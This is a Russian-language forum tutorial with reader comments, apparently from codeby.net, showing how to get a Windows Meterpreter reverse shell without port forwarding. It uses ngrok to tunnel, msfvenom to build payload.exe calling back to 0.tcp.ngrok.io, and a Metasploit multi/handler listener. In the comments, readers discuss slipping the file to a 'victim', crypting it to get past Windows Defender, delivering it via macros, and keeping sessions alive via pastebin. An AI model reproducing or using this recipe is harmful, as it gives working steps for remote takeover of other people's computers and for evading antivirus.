Статья [Metasploit] устанавливаем обратное TCP соединение через ngrok

26924

Привет codeby.net!

Сегодня я вам покажу как можно получить обратное подключение без прокидывание портов и лишнего геморроя.
Для реализации обратного подключения нам понадобиться metasploit и ngrok.

Metasploit - проект, посвящённый информационной безопасности. Создан для предоставления информации об уязвимостях, помощи в создании сигнатур для IDS, создания и тестирования эксплойтов.
Ngrok - это платформа, которая с помощью установленной утилиты, позволяет, организовать удалённый доступ на веб-сервер или какой-то другой сервис.

Для начало нам надо зарегистрировать аккаунт ngrok. Переходим на сайт , регистрируем аккаунт и выполняем первых три пункта.

24814
Подготовка выполнена, переходим к реализации задуманного.

Шаг 1 - Запускаем Ngrok
Запускаем ngrok: ./ngrok tcp 4444

24815
После запуска ngrok, вы увидете что то похожое на tcp://0.tcp.ngrok.io:13286 -> localhost:4444
Это означает что весь трафик который будет идти на 0.tcp.ngrok.io через порт 13286 будет перенаправляться к нам в машину на порт 4444. Не закрываем терминал и переходим к следующему шагу.

Шаг 2 - Создаем пользовательскую нагрузку
Запустим другой терминал и создадим пользовательскую нагрузку с вышеупомянутым хостом и портом.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=13286 -f exe > payload.exe

24816
В данном примере создается пользовательская нагрузка windows, но вам никто не запрещает создать payloads под любую другую ОС используя тот же LHOST и LPORT.

Шаг 3 - Запускаем metasploit listener
Когда все настроено нам остается запустить слушатель. Сделать это можно выполнив приведенные команды ниже.
Код:
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST localhost
set LPORT 4444
exploit
24817
После того как вы выполняете команду “exploit”, metasploit запустить слушатель на порт 4444 на вашей машине, который будет следить за любым входящим обратным TCP соединением.
На этом настройка закончена. После того когда на windows машине запуститься сгенерированная нами пользовательская нагрузка “payload.exe” в консоли мы увидим обратное подключение.

24818
Доступ к атакуемой машине получен а значит мы добились поставленной задачи ;) На этом пожалуй все, надеюсь данный материал был полезен :)
 
Последнее редактирование:
Проверил на себе нагрузки:
android/meterpreter/reverse_tcp
android/meterpreter/reverse_http
Снимок экрана от 2019-01-10 14-10-26.png

всё работает как часы.
 
  • Нравится
Реакции: LTD и n3d.b0y
После того когда на windows машине запуститься сгенерированная нами пользовательская нагрузка “payload.exe” в консоли мы увидим обратное подключение.
подскажите совсем зеленому, как запустить этот пейлоад на тарегт хосте?? это происходит автоматически или же "payload.exe" нужно подсунуть "жертве" что бы она сама запустила его на своем ПК?
 
подскажите совсем зеленому, как запустить этот пейлоад на тарегт хосте?? это происходит автоматически или же "payload.exe" нужно подсунуть "жертве" что бы она сама запустила его на своем ПК?
Подсунуть.

Разумеется с согласия жертвы в рамках теста)
 
  • Нравится
Реакции: LTD и Pablo Garcia
только мало толку,одноразовая сессия
В корне с этим не согласен. Все зависит от того как это реализовать. Вот один пример из большого количество который можно привести. Если делать payload с восстановление сессии то можно залить порт на pastebin и перед подключением проверять его там. Когда порт измениться меняешь порт на pastebin и все сново работает.

p.s Все ограничивается вашей фантазией ;) Не нужна воспринимать все шаги как строгую инструкцию. Суть статьи показать как можно открыть порт)
 
Последнее редактирование:
  • Нравится
Реакции: Andrei Cenusa и MrBa
попробовал. сталкнулся с очевидной проблемой( палевностью пейлоада). Через почту или файл обменник не дает отправить/залить. скинул нагрузку на флешку и руками закинул на таргет хост( вин10 бе ав) стандартные системы защиты винды сразу за визжали и определил нагрузку как троян. Залес в карантин выбрал нагрузку и разрешил ее активацию, сессия на мгновение запустилась и тут же упала. От сюда вопросы: как криптануть нагрузку и возможно ли доставка по средствам макросов или подобных методов?
 
у меня выдает ошибку при создании payload'а. Именно такого. Другие создаются спокойно
 
Откуда такая информация?
Читайте другие темы.) Во вчерашней теме вроде было сказано. (Про seeker)

Это же уже старый спсоб, у некоторых робит, у некоторых нет.) Год назад видел чисто такую же... Тему, только скрины были другие.)
 
ngrok роскомнадзор в сфере интернета все теперь нету программ наподобие ngrok
 
ngrok роскомнадзор в сфере интернета все теперь нету программ наподобие ngrok
Странно, гуглил все что можно, также искал на сайте ркн. В итоге не нашел абсолютно ничего связанного с блокировкой ngrok в РФ. Можете поделиться ссылкой на статью, новость или документ связанный с блокировкой?
 
Извиняюсь. Сегодня затестил ngrok- не цыпляется. borrow.io и serve.net вообще на сайт не заходит даже..... :(
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!